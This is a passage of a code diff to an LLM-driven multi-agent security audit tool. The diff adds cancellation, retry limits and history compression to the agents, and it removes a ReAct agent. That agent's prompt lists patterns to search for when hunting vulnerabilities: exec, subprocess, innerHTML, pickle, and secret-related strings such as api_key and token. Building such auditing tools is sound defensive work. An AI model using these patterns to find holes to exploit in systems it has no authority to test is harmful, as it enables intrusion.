def on_error(self, error: str) -> None:
    """Lifecycle hook: mark the state as failed and set the registry status to "failed".

    Args:
        error: Error message stored on the state and passed to the registry.
    """
    self._state.set_failed(error)
    agent_registry.update_agent_status(self._agent_id, "failed", {"error": error})
|
||||
|
||||
@abstractmethod
|
||||
async def run(self, input_data: Dict[str, Any]) -> AgentResult:
|
||||
"""
|
||||
|
|
@ -296,6 +482,7 @@ class BaseAgent(ABC):
|
|||
def cancel(self):
    """Request cancellation by setting the ``_cancelled`` flag and logging it."""
    self._cancelled = True
    logger.info(f"[{self.name}] Cancel requested")
|
||||
|
||||
@property
|
||||
def is_cancelled(self) -> bool:
|
||||
|
|
@ -671,6 +858,35 @@ class BaseAgent(ABC):
|
|||
"tokens_used": self._total_tokens,
|
||||
}
|
||||
|
||||
# ============ Memory Compression ============
|
||||
|
||||
def compress_messages_if_needed(
    self,
    messages: List[Dict[str, str]],
    max_tokens: int = 100000,
) -> List[Dict[str, str]]:
    """
    Compress the message history when the compressor deems it too long.

    Args:
        messages: Message list.
        max_tokens: Token budget handed to the compressor.

    Returns:
        The compressed message list, or ``messages`` itself when no
        compression is needed.
    """
    from ...llm.memory_compressor import MemoryCompressor

    compressor = MemoryCompressor(max_total_tokens=max_tokens)

    if not compressor.should_compress(messages):
        return messages

    logger.info(f"[{self.name}] Compressing conversation history...")
    shortened = compressor.compress_history(messages)
    logger.info(f"[{self.name}] Compressed {len(messages)} -> {len(shortened)} messages")
    return shortened
|
||||
|
||||
# ============ 统一的流式 LLM 调用 ============
|
||||
|
||||
async def stream_llm_call(
|
||||
|
|
@ -678,6 +894,7 @@ class BaseAgent(ABC):
|
|||
messages: List[Dict[str, str]],
|
||||
temperature: float = 0.1,
|
||||
max_tokens: int = 2048,
|
||||
auto_compress: bool = True,
|
||||
) -> Tuple[str, int]:
|
||||
"""
|
||||
统一的流式 LLM 调用方法
|
||||
|
|
@ -688,13 +905,23 @@ class BaseAgent(ABC):
|
|||
messages: 消息列表
|
||||
temperature: 温度
|
||||
max_tokens: 最大 token 数
|
||||
auto_compress: 是否自动压缩过长的消息历史
|
||||
|
||||
Returns:
|
||||
(完整响应内容, token数量)
|
||||
"""
|
||||
# 🔥 自动压缩过长的消息历史
|
||||
if auto_compress:
|
||||
messages = self.compress_messages_if_needed(messages)
|
||||
|
||||
accumulated = ""
|
||||
total_tokens = 0
|
||||
|
||||
# 🔥 在开始 LLM 调用前检查取消
|
||||
if self.is_cancelled:
|
||||
logger.info(f"[{self.name}] Cancelled before LLM call")
|
||||
return "", 0
|
||||
|
||||
await self.emit_thinking_start()
|
||||
|
||||
try:
|
||||
|
|
@ -705,6 +932,7 @@ class BaseAgent(ABC):
|
|||
):
|
||||
# 检查取消
|
||||
if self.is_cancelled:
|
||||
logger.info(f"[{self.name}] Cancelled during LLM streaming")
|
||||
break
|
||||
|
||||
if chunk["type"] == "token":
|
||||
|
|
@ -745,6 +973,10 @@ class BaseAgent(ABC):
|
|||
Returns:
|
||||
工具执行结果字符串
|
||||
"""
|
||||
# 🔥 在执行工具前检查取消
|
||||
if self.is_cancelled:
|
||||
return "任务已取消"
|
||||
|
||||
tool = self.tools.get(tool_name)
|
||||
|
||||
if not tool:
|
||||
|
|
|
|||
|
|
@ -79,7 +79,7 @@ Action Input: [JSON 参数]
|
|||
```
|
||||
|
||||
## 审计策略建议
|
||||
- 先用 recon Agent 了解项目全貌
|
||||
- 先用 recon Agent 了解项目全貌(只需调度一次)
|
||||
- 根据 recon 结果,让 analysis Agent 重点审计高风险区域
|
||||
- 发现可疑漏洞后,用 verification Agent 验证
|
||||
- 随时根据新发现调整策略,不要机械执行
|
||||
|
|
@ -90,6 +90,15 @@ Action Input: [JSON 参数]
|
|||
2. **动态调整** - 根据发现调整策略
|
||||
3. **主动决策** - 不要等待,主动推进
|
||||
4. **质量优先** - 宁可深入分析几个真实漏洞,不要浅尝辄止
|
||||
5. **避免重复** - 每个 Agent 通常只需要调度一次,如果结果不理想,尝试其他 Agent 或直接完成审计
|
||||
|
||||
## 处理子 Agent 结果
|
||||
- 子 Agent 返回的 Observation 包含它们的分析结果
|
||||
- 即使结果看起来不完整,也要基于已有信息继续推进
|
||||
- 不要反复调度同一个 Agent 期望得到不同结果
|
||||
- 如果 recon 完成后,应该调度 analysis 进行深度分析
|
||||
- 如果 analysis 完成后有发现,可以调度 verification 验证
|
||||
- 如果没有更多工作要做,使用 finish 结束审计
|
||||
|
||||
现在,基于项目信息开始你的审计工作!"""
|
||||
|
||||
|
|
@ -137,10 +146,31 @@ class OrchestratorAgent(BaseAgent):
|
|||
self._steps: List[AgentStep] = []
|
||||
self._all_findings: List[Dict] = []
|
||||
|
||||
# 🔥 存储运行时上下文,用于传递给子 Agent
|
||||
self._runtime_context: Dict[str, Any] = {}
|
||||
|
||||
# 🔥 跟踪已调度的 Agent 任务,避免重复调度
|
||||
self._dispatched_tasks: Dict[str, int] = {} # agent_name -> dispatch_count
|
||||
|
||||
def register_sub_agent(self, name: str, agent: BaseAgent):
    """Make ``agent`` available for dispatch under the key ``name``.

    Args:
        name: Key under which the sub-agent is stored.
        agent: The sub-agent instance to store.

    A sub-agent already stored under the same name is replaced.
    """
    registry = self.sub_agents
    registry[name] = agent
|
||||
|
||||
def cancel(self):
    """
    Cancel this agent and forward the request to every registered sub-agent.

    Sets the ``_cancelled`` flag on this agent, then calls ``cancel()`` on each
    entry of ``self.sub_agents`` that exposes such a method, so that a running
    child stops as well.
    """
    self._cancelled = True
    children = self.sub_agents
    logger.info(f"[{self.name}] Cancel requested, propagating to {len(children)} sub-agents")

    for child_name, child in children.items():
        # Entries without a cancel() method are skipped rather than treated as errors.
        if not hasattr(child, 'cancel'):
            continue
        child.cancel()
        logger.info(f"[{self.name}] Cancelled sub-agent: {child_name}")
|
||||
|
||||
async def run(self, input_data: Dict[str, Any]) -> AgentResult:
|
||||
"""
|
||||
执行编排任务 - LLM 全程参与!
|
||||
|
|
@ -149,6 +179,8 @@ class OrchestratorAgent(BaseAgent):
|
|||
input_data: {
|
||||
"project_info": 项目信息,
|
||||
"config": 审计配置,
|
||||
"project_root": 项目根目录,
|
||||
"task_id": 任务ID,
|
||||
}
|
||||
"""
|
||||
import time
|
||||
|
|
@ -157,6 +189,14 @@ class OrchestratorAgent(BaseAgent):
|
|||
project_info = input_data.get("project_info", {})
|
||||
config = input_data.get("config", {})
|
||||
|
||||
# 🔥 保存运行时上下文,用于传递给子 Agent
|
||||
self._runtime_context = {
|
||||
"project_info": project_info,
|
||||
"config": config,
|
||||
"project_root": input_data.get("project_root", project_info.get("root", ".")),
|
||||
"task_id": input_data.get("task_id"),
|
||||
}
|
||||
|
||||
# 构建初始消息
|
||||
initial_message = self._build_initial_message(project_info, config)
|
||||
|
||||
|
|
@ -169,6 +209,7 @@ class OrchestratorAgent(BaseAgent):
|
|||
self._steps = []
|
||||
self._all_findings = []
|
||||
final_result = None
|
||||
error_message = None # 🔥 跟踪错误信息
|
||||
|
||||
await self.emit_thinking("🧠 Orchestrator Agent 启动,LLM 开始自主编排决策...")
|
||||
|
||||
|
|
@ -189,7 +230,7 @@ class OrchestratorAgent(BaseAgent):
|
|||
llm_output, tokens_this_round = await self.stream_llm_call(
|
||||
self._conversation_history,
|
||||
temperature=0.1,
|
||||
max_tokens=2048,
|
||||
max_tokens=4096, # 🔥 增加到 4096,避免截断
|
||||
)
|
||||
except asyncio.CancelledError:
|
||||
logger.info(f"[{self.name}] LLM call cancelled")
|
||||
|
|
@ -197,11 +238,37 @@ class OrchestratorAgent(BaseAgent):
|
|||
|
||||
self._total_tokens += tokens_this_round
|
||||
|
||||
# 🔥 检测空响应
|
||||
if not llm_output or not llm_output.strip():
|
||||
logger.warning(f"[{self.name}] Empty LLM response")
|
||||
empty_retry_count = getattr(self, '_empty_retry_count', 0) + 1
|
||||
self._empty_retry_count = empty_retry_count
|
||||
if empty_retry_count >= 3:
|
||||
logger.error(f"[{self.name}] Too many empty responses, stopping")
|
||||
error_message = "连续收到空响应,停止编排"
|
||||
await self.emit_event("error", error_message)
|
||||
break
|
||||
self._conversation_history.append({
|
||||
"role": "user",
|
||||
"content": "Received empty response. Please output Thought + Action + Action Input.",
|
||||
})
|
||||
continue
|
||||
|
||||
# 重置空响应计数器
|
||||
self._empty_retry_count = 0
|
||||
|
||||
# 解析 LLM 的决策
|
||||
step = self._parse_llm_response(llm_output)
|
||||
|
||||
if not step:
|
||||
# LLM 输出格式不正确,提示重试
|
||||
format_retry_count = getattr(self, '_format_retry_count', 0) + 1
|
||||
self._format_retry_count = format_retry_count
|
||||
if format_retry_count >= 3:
|
||||
logger.error(f"[{self.name}] Too many format errors, stopping")
|
||||
error_message = "连续格式错误,停止编排"
|
||||
await self.emit_event("error", error_message)
|
||||
break
|
||||
await self.emit_llm_decision("格式错误", "需要重新输出")
|
||||
self._conversation_history.append({
|
||||
"role": "assistant",
|
||||
|
|
@ -213,6 +280,9 @@ class OrchestratorAgent(BaseAgent):
|
|||
})
|
||||
continue
|
||||
|
||||
# 重置格式重试计数器
|
||||
self._format_retry_count = 0
|
||||
|
||||
self._steps.append(step)
|
||||
|
||||
# 🔥 发射 LLM 思考内容事件 - 展示编排决策的思考过程
|
||||
|
|
@ -249,6 +319,11 @@ class OrchestratorAgent(BaseAgent):
|
|||
observation = await self._dispatch_agent(step.action_input)
|
||||
step.observation = observation
|
||||
|
||||
# 🔥 子 Agent 执行完成后检查取消状态
|
||||
if self.is_cancelled:
|
||||
logger.info(f"[{self.name}] Cancelled after sub-agent dispatch")
|
||||
break
|
||||
|
||||
# 🔥 发射观察事件
|
||||
await self.emit_llm_observation(observation)
|
||||
|
||||
|
|
@ -272,6 +347,60 @@ class OrchestratorAgent(BaseAgent):
|
|||
# 生成最终结果
|
||||
duration_ms = int((time.time() - start_time) * 1000)
|
||||
|
||||
# 🔥 如果被取消,返回取消结果
|
||||
if self.is_cancelled:
|
||||
await self.emit_event(
|
||||
"info",
|
||||
f"🛑 Orchestrator 已取消: {len(self._all_findings)} 个发现, {self._iteration} 轮决策"
|
||||
)
|
||||
return AgentResult(
|
||||
success=False,
|
||||
error="任务已取消",
|
||||
data={
|
||||
"findings": self._all_findings,
|
||||
"steps": [
|
||||
{
|
||||
"thought": s.thought,
|
||||
"action": s.action,
|
||||
"action_input": s.action_input,
|
||||
"observation": s.observation[:500] if s.observation else None,
|
||||
}
|
||||
for s in self._steps
|
||||
],
|
||||
},
|
||||
iterations=self._iteration,
|
||||
tool_calls=self._tool_calls,
|
||||
tokens_used=self._total_tokens,
|
||||
duration_ms=duration_ms,
|
||||
)
|
||||
|
||||
# 🔥 如果有错误,返回失败结果
|
||||
if error_message:
|
||||
await self.emit_event(
|
||||
"error",
|
||||
f"❌ Orchestrator 失败: {error_message}"
|
||||
)
|
||||
return AgentResult(
|
||||
success=False,
|
||||
error=error_message,
|
||||
data={
|
||||
"findings": self._all_findings,
|
||||
"steps": [
|
||||
{
|
||||
"thought": s.thought,
|
||||
"action": s.action,
|
||||
"action_input": s.action_input,
|
||||
"observation": s.observation[:500] if s.observation else None,
|
||||
}
|
||||
for s in self._steps
|
||||
],
|
||||
},
|
||||
iterations=self._iteration,
|
||||
tool_calls=self._tool_calls,
|
||||
tokens_used=self._total_tokens,
|
||||
duration_ms=duration_ms,
|
||||
)
|
||||
|
||||
await self.emit_event(
|
||||
"info",
|
||||
f"🎯 Orchestrator 完成: {len(self._all_findings)} 个发现, {self._iteration} 轮决策"
|
||||
|
|
@ -377,6 +506,30 @@ class OrchestratorAgent(BaseAgent):
|
|||
available = list(self.sub_agents.keys())
|
||||
return f"错误: Agent '{agent_name}' 不存在。可用的 Agent: {available}"
|
||||
|
||||
# 🔥 检查是否重复调度同一个 Agent
|
||||
dispatch_count = self._dispatched_tasks.get(agent_name, 0)
|
||||
if dispatch_count >= 2:
|
||||
return f"""## ⚠️ 重复调度警告
|
||||
|
||||
你已经调度 {agent_name} Agent {dispatch_count} 次了。
|
||||
|
||||
如果之前的调度没有返回有用的结果,请考虑:
|
||||
1. 尝试调度其他 Agent(如 analysis 或 verification)
|
||||
2. 使用 finish 操作结束审计并汇总已有发现
|
||||
3. 提供更具体的任务描述
|
||||
|
||||
当前已收集的发现数量: {len(self._all_findings)}
|
||||
"""
|
||||
|
||||
self._dispatched_tasks[agent_name] = dispatch_count + 1
|
||||
|
||||
# 🔥 设置父 Agent ID 并注册到注册表(动态 Agent 树)
|
||||
logger.info(f"[Orchestrator] 准备调度 {agent_name} Agent, agent._registered={agent._registered}")
|
||||
agent.set_parent_id(self._agent_id)
|
||||
logger.info(f"[Orchestrator] 设置 parent_id 完成,准备注册 {agent_name}")
|
||||
agent._register_to_registry(task=task)
|
||||
logger.info(f"[Orchestrator] {agent_name} 注册完成,agent._registered={agent._registered}")
|
||||
|
||||
await self.emit_event(
|
||||
"dispatch",
|
||||
f"📤 调度 {agent_name} Agent: {task[:100]}...",
|
||||
|
|
@ -387,31 +540,92 @@ class OrchestratorAgent(BaseAgent):
|
|||
self._tool_calls += 1
|
||||
|
||||
try:
|
||||
# 构建子 Agent 输入
|
||||
# 🔥 构建子 Agent 输入 - 传递完整的运行时上下文
|
||||
project_info = self._runtime_context.get("project_info", {}).copy()
|
||||
# 确保 project_info 包含 root 路径
|
||||
if "root" not in project_info:
|
||||
project_info["root"] = self._runtime_context.get("project_root", ".")
|
||||
|
||||
sub_input = {
|
||||
"task": task,
|
||||
"task_context": context,
|
||||
"project_info": {}, # 从上下文获取
|
||||
"config": {},
|
||||
"project_info": project_info,
|
||||
"config": self._runtime_context.get("config", {}),
|
||||
"project_root": self._runtime_context.get("project_root", "."),
|
||||
"previous_results": {
|
||||
"findings": self._all_findings, # 传递已收集的发现
|
||||
},
|
||||
}
|
||||
|
||||
# 🔥 执行子 Agent 前检查取消状态
|
||||
if self.is_cancelled:
|
||||
return f"## {agent_name} Agent 执行取消\n\n任务已被用户取消"
|
||||
|
||||
# 执行子 Agent
|
||||
result = await agent.run(sub_input)
|
||||
|
||||
# 收集发现
|
||||
# 🔥 执行后再次检查取消状态
|
||||
if self.is_cancelled:
|
||||
return f"## {agent_name} Agent 执行中断\n\n任务已被用户取消"
|
||||
|
||||
# 🔥 处理子 Agent 结果 - 不同 Agent 返回不同的数据结构
|
||||
if result.success and result.data:
|
||||
findings = result.data.get("findings", [])
|
||||
self._all_findings.extend(findings)
|
||||
data = result.data
|
||||
|
||||
# 🔥 收集发现 - 只收集格式正确的漏洞对象
|
||||
# findings 字段通常来自 Analysis/Verification Agent,是漏洞对象数组
|
||||
# initial_findings 来自 Recon Agent,可能是字符串数组(观察)或对象数组
|
||||
findings = data.get("findings", [])
|
||||
if findings:
|
||||
# 只添加字典格式的发现
|
||||
valid_findings = [f for f in findings if isinstance(f, dict)]
|
||||
self._all_findings.extend(valid_findings)
|
||||
|
||||
await self.emit_event(
|
||||
"dispatch_complete",
|
||||
f"✅ {agent_name} Agent 完成: {len(findings)} 个发现",
|
||||
f"✅ {agent_name} Agent 完成",
|
||||
agent=agent_name,
|
||||
findings_count=len(findings),
|
||||
)
|
||||
|
||||
# 构建观察结果
|
||||
observation = f"""## {agent_name} Agent 执行结果
|
||||
# 🔥 根据 Agent 类型构建不同的观察结果
|
||||
if agent_name == "recon":
|
||||
# Recon Agent 返回项目信息
|
||||
observation = f"""## Recon Agent 执行结果
|
||||
|
||||
**状态**: 成功
|
||||
**迭代次数**: {result.iterations}
|
||||
**耗时**: {result.duration_ms}ms
|
||||
|
||||
### 项目结构
|
||||
{json.dumps(data.get('project_structure', {}), ensure_ascii=False, indent=2)}
|
||||
|
||||
### 技术栈
|
||||
- 语言: {data.get('tech_stack', {}).get('languages', [])}
|
||||
- 框架: {data.get('tech_stack', {}).get('frameworks', [])}
|
||||
- 数据库: {data.get('tech_stack', {}).get('databases', [])}
|
||||
|
||||
### 入口点 ({len(data.get('entry_points', []))} 个)
|
||||
"""
|
||||
for i, ep in enumerate(data.get('entry_points', [])[:10]):
|
||||
if isinstance(ep, dict):
|
||||
observation += f"{i+1}. [{ep.get('type', 'unknown')}] {ep.get('file', '')}:{ep.get('line', '')}\n"
|
||||
|
||||
observation += f"""
|
||||
### 高风险区域
|
||||
{data.get('high_risk_areas', [])}
|
||||
|
||||
### 初步发现 ({len(data.get('initial_findings', []))} 个)
|
||||
"""
|
||||
for finding in data.get('initial_findings', [])[:5]:
|
||||
if isinstance(finding, str):
|
||||
observation += f"- {finding}\n"
|
||||
elif isinstance(finding, dict):
|
||||
observation += f"- {finding.get('title', finding)}\n"
|
||||
|
||||
else:
|
||||
# Analysis/Verification Agent 返回漏洞发现
|
||||
observation = f"""## {agent_name} Agent 执行结果
|
||||
|
||||
**状态**: 成功
|
||||
**发现数量**: {len(findings)}
|
||||
|
|
@ -420,22 +634,21 @@ class OrchestratorAgent(BaseAgent):
|
|||
|
||||
### 发现摘要
|
||||
"""
|
||||
for i, f in enumerate(findings[:10]): # 最多显示 10 个
|
||||
if not isinstance(f, dict):
|
||||
continue
|
||||
|
||||
observation += f"""
|
||||
for i, f in enumerate(findings[:10]):
|
||||
if not isinstance(f, dict):
|
||||
continue
|
||||
observation += f"""
|
||||
{i+1}. [{f.get('severity', 'unknown')}] {f.get('title', 'Unknown')}
|
||||
- 类型: {f.get('vulnerability_type', 'unknown')}
|
||||
- 文件: {f.get('file_path', 'unknown')}
|
||||
- 描述: {f.get('description', '')[:200]}...
|
||||
"""
|
||||
|
||||
if len(findings) > 10:
|
||||
observation += f"\n... 还有 {len(findings) - 10} 个发现"
|
||||
if len(findings) > 10:
|
||||
observation += f"\n... 还有 {len(findings) - 10} 个发现"
|
||||
|
||||
if result.data.get("summary"):
|
||||
observation += f"\n\n### Agent 总结\n{result.data['summary']}"
|
||||
if data.get("summary"):
|
||||
observation += f"\n\n### Agent 总结\n{data['summary']}"
|
||||
|
||||
return observation
|
||||
else:
|
||||
|
|
|
|||
|
|
@ -1,380 +0,0 @@
|
|||
"""
|
||||
真正的 ReAct Agent 实现
|
||||
LLM 是大脑,全程参与决策!
|
||||
|
||||
ReAct 循环:
|
||||
1. Thought: LLM 思考当前状态和下一步
|
||||
2. Action: LLM 决定调用哪个工具
|
||||
3. Observation: 执行工具,获取结果
|
||||
4. 重复直到 LLM 决定完成
|
||||
"""
|
||||
|
||||
import json
|
||||
import logging
|
||||
import re
|
||||
from typing import List, Dict, Any, Optional, Tuple
|
||||
from dataclasses import dataclass
|
||||
|
||||
from .base import BaseAgent, AgentConfig, AgentResult, AgentType, AgentPattern
|
||||
from ..json_parser import AgentJsonParser
|
||||
|
||||
logger = logging.getLogger(__name__)
|
||||
|
||||
|
||||
REACT_SYSTEM_PROMPT = """你是 DeepAudit 安全审计 Agent,一个专业的代码安全分析专家。
|
||||
|
||||
## 你的任务
|
||||
对目标项目进行全面的安全审计,发现潜在的安全漏洞。
|
||||
|
||||
## 你的工具
|
||||
{tools_description}
|
||||
|
||||
## 工作方式
|
||||
你需要通过 **思考-行动-观察** 循环来完成任务:
|
||||
|
||||
1. **Thought**: 分析当前情况,思考下一步应该做什么
|
||||
2. **Action**: 选择一个工具并执行
|
||||
3. **Observation**: 观察工具返回的结果
|
||||
4. 重复上述过程直到你认为审计完成
|
||||
|
||||
## 输出格式
|
||||
每一步必须严格按照以下格式输出:
|
||||
|
||||
```
|
||||
Thought: [你的思考过程,分析当前状态,决定下一步]
|
||||
Action: [工具名称]
|
||||
Action Input: [工具参数,JSON 格式]
|
||||
```
|
||||
|
||||
当你完成分析后,输出:
|
||||
```
|
||||
Thought: [总结分析结果]
|
||||
Final Answer: [JSON 格式的最终发现]
|
||||
```
|
||||
|
||||
## Final Answer 格式
|
||||
```json
|
||||
{{
|
||||
"findings": [
|
||||
{{
|
||||
"vulnerability_type": "sql_injection",
|
||||
"severity": "high",
|
||||
"title": "SQL 注入漏洞",
|
||||
"description": "详细描述",
|
||||
"file_path": "path/to/file.py",
|
||||
"line_start": 42,
|
||||
"code_snippet": "危险代码片段",
|
||||
"suggestion": "修复建议"
|
||||
}}
|
||||
],
|
||||
"summary": "审计总结"
|
||||
}}
|
||||
```
|
||||
|
||||
## 审计策略建议
|
||||
1. 先用 list_files 了解项目结构
|
||||
2. 识别关键文件(路由、控制器、数据库操作)
|
||||
3. 使用 search_code 搜索危险模式(eval, exec, query, innerHTML 等)
|
||||
4. 读取可疑文件进行深度分析
|
||||
5. 如果有 semgrep,用它进行全面扫描
|
||||
|
||||
## 重点关注的漏洞类型
|
||||
- SQL 注入 (query, execute, raw SQL)
|
||||
- XSS (innerHTML, document.write, v-html)
|
||||
- 命令注入 (exec, system, subprocess, child_process)
|
||||
- 路径遍历 (open, readFile, path concatenation)
|
||||
- SSRF (requests, fetch, http client)
|
||||
- 硬编码密钥 (password, secret, api_key, token)
|
||||
- 不安全的反序列化 (pickle, yaml.load, eval)
|
||||
|
||||
现在开始审计!"""
|
||||
|
||||
|
||||
@dataclass
class AgentStep:
    """One round of the agent loop, as parsed from a single LLM reply."""

    # Text of the "Thought:" section; empty string when none was found.
    thought: str
    # Tool name from the "Action:" line, or None when the reply named no tool.
    action: Optional[str] = None
    # Parsed "Action Input:" payload that is passed to the tool as keyword arguments.
    action_input: Optional[Dict] = None
    # Tool output recorded after the action has been executed.
    observation: Optional[str] = None
    # True when the reply contained a "Final Answer:" section.
    is_final: bool = False
    # Parsed "Final Answer:" payload; only set when is_final is True.
    final_answer: Optional[Dict] = None
|
||||
|
||||
|
||||
class ReActAgent(BaseAgent):
    """
    ReAct (reason + act) agent in which the LLM makes every decision.

    Each iteration asks the LLM for a ``Thought`` followed by either an
    ``Action`` / ``Action Input`` pair (a tool call) or a ``Final Answer``.
    Tool output is fed back to the LLM as an ``Observation`` until a final
    answer arrives, the iteration budget is used up, or the agent is cancelled.
    """

    def __init__(
        self,
        llm_service,
        tools: Dict[str, Any],
        event_emitter=None,
        agent_type: AgentType = AgentType.ANALYSIS,
        max_iterations: int = 30,
    ):
        """
        Args:
            llm_service: Service object; ``run`` awaits its ``chat_completion_raw``.
            tools: Mapping of tool name to tool object.
            event_emitter: Optional emitter forwarded to ``BaseAgent``.
            agent_type: Agent type stored in the generated ``AgentConfig``.
            max_iterations: Upper bound on Thought/Action rounds in ``run``.
        """
        config = AgentConfig(
            name="ReActAgent",
            agent_type=agent_type,
            pattern=AgentPattern.REACT,
            max_iterations=max_iterations,
            system_prompt=REACT_SYSTEM_PROMPT,
        )
        super().__init__(config, llm_service, tools, event_emitter)

        self._conversation_history: List[Dict[str, str]] = []
        self._steps: List[AgentStep] = []

    def _get_tools_description(self) -> str:
        """Render a Markdown description of the tools for the system prompt.

        Tools whose name starts with ``_`` are omitted. For tools that expose a
        truthy ``args_schema``, every schema property is listed with its type
        and description.
        """
        descriptions = []

        for name, tool in self.tools.items():
            if name.startswith("_"):
                continue

            desc = f"### {name}\n"
            desc += f"{tool.description}\n"

            # Append the parameter list when the tool publishes a schema.
            if hasattr(tool, 'args_schema') and tool.args_schema:
                schema = tool.args_schema.schema()
                properties = schema.get("properties", {})
                if properties:
                    desc += "参数:\n"
                    for param_name, param_info in properties.items():
                        param_desc = param_info.get("description", "")
                        param_type = param_info.get("type", "string")
                        desc += f" - {param_name} ({param_type}): {param_desc}\n"

            descriptions.append(desc)

        return "\n".join(descriptions)

    def _build_system_prompt(self, project_info: Dict, task_context: str = "") -> str:
        """Fill the prompt template and append project and task sections.

        Args:
            project_info: Optional dict; ``name``, ``languages`` and
                ``file_count`` are read when it is non-empty.
            task_context: Optional free text appended as its own section.

        Returns:
            The complete system prompt.
        """
        tools_desc = self._get_tools_description()
        prompt = self.config.system_prompt.format(tools_description=tools_desc)

        if project_info:
            prompt += "\n\n## 项目信息\n"
            prompt += f"- 名称: {project_info.get('name', 'unknown')}\n"
            prompt += f"- 语言: {', '.join(project_info.get('languages', ['unknown']))}\n"
            prompt += f"- 文件数: {project_info.get('file_count', 'unknown')}\n"

        if task_context:
            prompt += f"\n\n## 任务上下文\n{task_context}"

        return prompt

    def _parse_llm_response(self, response: str) -> AgentStep:
        """Split one LLM reply into thought, action, action input or final answer.

        A reply containing ``Final Answer:`` is treated as terminal: the text
        after the marker is stripped of Markdown code fences and parsed as JSON.
        ``final_answer`` is always a dict, and ``final_answer["findings"]``,
        when present, is always a list of dicts.

        Args:
            response: Raw text returned by the LLM.

        Returns:
            The populated ``AgentStep``.
        """
        step = AgentStep(thought="")

        # Thought: everything up to the next section marker (or end of text).
        thought_match = re.search(r'Thought:\s*(.*?)(?=Action:|Final Answer:|$)', response, re.DOTALL)
        if thought_match:
            step.thought = thought_match.group(1).strip()

        # Final answer takes precedence over any Action in the same reply.
        final_match = re.search(r'Final Answer:\s*(.*?)$', response, re.DOTALL)
        if final_match:
            step.is_final = True
            answer_text = final_match.group(1).strip()
            answer_text = re.sub(r'```json\s*', '', answer_text)
            answer_text = re.sub(r'```\s*', '', answer_text)
            parsed = AgentJsonParser.parse(
                answer_text,
                default={"raw_answer": answer_text}
            )
            # The parser's return type is not visible here; a non-dict result
            # (e.g. a bare string or list) would break the key lookups below.
            if not isinstance(parsed, dict):
                parsed = {"raw_answer": answer_text}
            if "findings" in parsed:
                raw_findings = parsed["findings"]
                # Keep only well-formed finding objects; a non-list value
                # (None, a single object, a string) yields no findings.
                if isinstance(raw_findings, (list, tuple)):
                    parsed["findings"] = [f for f in raw_findings if isinstance(f, dict)]
                else:
                    parsed["findings"] = []
            step.final_answer = parsed
            return step

        # Action: a single identifier naming the tool.
        action_match = re.search(r'Action:\s*(\w+)', response)
        if action_match:
            step.action = action_match.group(1).strip()

        # Action Input: JSON payload, optionally wrapped in a code fence.
        input_match = re.search(r'Action Input:\s*(.*?)(?=Thought:|Action:|Observation:|$)', response, re.DOTALL)
        if input_match:
            input_text = input_match.group(1).strip()
            input_text = re.sub(r'```json\s*', '', input_text)
            input_text = re.sub(r'```\s*', '', input_text)
            step.action_input = AgentJsonParser.parse(
                input_text,
                default={"raw_input": input_text}
            )

        return step

    async def _execute_tool(self, tool_name: str, tool_input: Dict) -> str:
        """Run one tool and return its output as the observation text.

        Failures never raise: an unknown tool, an unsuccessful result, or an
        exception inside the tool is turned into an error string so the LLM
        can react to it in the next round.

        Args:
            tool_name: Key into ``self.tools``.
            tool_input: Keyword arguments passed to ``tool.execute``.

        Returns:
            The tool output, cut to 4000 characters, or an error message.
        """
        tool = self.tools.get(tool_name)

        if not tool:
            return f"错误: 工具 '{tool_name}' 不存在。可用工具: {list(self.tools.keys())}"

        try:
            self._tool_calls += 1
            await self.emit_tool_call(tool_name, tool_input)

            import time
            start = time.time()

            result = await tool.execute(**tool_input)

            duration_ms = int((time.time() - start) * 1000)
            # Stringify once; the same text feeds the event preview and the observation.
            output = str(result.data)
            await self.emit_tool_result(tool_name, output[:200], duration_ms)

            if result.success:
                # Truncate long output and tell the LLM the original length.
                if len(output) > 4000:
                    output = output[:4000] + "\n\n... [输出已截断,共 {} 字符]".format(len(output))
                return output
            else:
                return f"工具执行失败: {result.error}"

        except Exception as e:
            logger.error(f"Tool execution error: {e}")
            return f"工具执行错误: {str(e)}"

    def _serialize_steps(self) -> List[Dict[str, Any]]:
        """Return the recorded steps as plain dicts, observations cut to 500 characters."""
        return [
            {
                "thought": s.thought,
                "action": s.action,
                "action_input": s.action_input,
                "observation": s.observation[:500] if s.observation else None,
            }
            for s in self._steps
        ]

    async def run(self, input_data: Dict[str, Any]) -> AgentResult:
        """
        Run the ReAct loop until the LLM gives a final answer.

        Args:
            input_data: Dict from which ``project_info`` and ``task_context``
                are read to build the system prompt.

        Returns:
            ``AgentResult`` whose ``data`` holds ``findings`` and ``steps``.
            ``success`` is False when the run was cancelled before a final
            answer was produced, or when an exception escaped the loop.
        """
        import time
        start_time = time.time()

        project_info = input_data.get("project_info", {})
        task_context = input_data.get("task_context", "")

        system_prompt = self._build_system_prompt(project_info, task_context)

        # Start every run from a fresh conversation.
        self._conversation_history = [
            {"role": "system", "content": system_prompt},
            {"role": "user", "content": "请开始对项目进行安全审计。首先了解项目结构,然后系统性地搜索和分析潜在的安全漏洞。"},
        ]

        self._steps = []
        all_findings = []
        finished = False  # becomes True once the LLM has produced a Final Answer

        await self.emit_thinking("🤖 ReAct Agent 启动,LLM 开始自主分析...")

        try:
            for iteration in range(self.config.max_iterations):
                if self.is_cancelled:
                    break

                self._iteration = iteration + 1

                await self.emit_thinking(f"💭 第 {iteration + 1} 轮思考...")

                response = await self.llm_service.chat_completion_raw(
                    messages=self._conversation_history,
                    temperature=0.1,
                    max_tokens=2048,
                )

                # `or` also covers keys that are present with a None value,
                # which dict.get's default argument does not.
                llm_output = response.get("content") or ""
                usage = response.get("usage") or {}
                self._total_tokens += usage.get("total_tokens", 0) or 0

                await self.emit_event("thinking", f"LLM: {llm_output[:500]}...")

                step = self._parse_llm_response(llm_output)
                self._steps.append(step)

                self._conversation_history.append({
                    "role": "assistant",
                    "content": llm_output,
                })

                if step.is_final:
                    finished = True
                    await self.emit_thinking("✅ LLM 完成分析,生成最终报告")

                    if step.final_answer and "findings" in step.final_answer:
                        all_findings = step.final_answer["findings"]
                    break

                if step.action:
                    await self.emit_thinking(f"🔧 LLM 决定调用工具: {step.action}")

                    observation = await self._execute_tool(
                        step.action,
                        step.action_input or {}
                    )

                    step.observation = observation

                    # Feed the tool output back to the LLM for the next round.
                    self._conversation_history.append({
                        "role": "user",
                        "content": f"Observation: {observation}",
                    })
                else:
                    # No tool chosen and no final answer: nudge the LLM onwards.
                    self._conversation_history.append({
                        "role": "user",
                        "content": "请继续分析,选择一个工具执行,或者如果分析完成,输出 Final Answer。",
                    })

            duration_ms = int((time.time() - start_time) * 1000)
            result_data = {
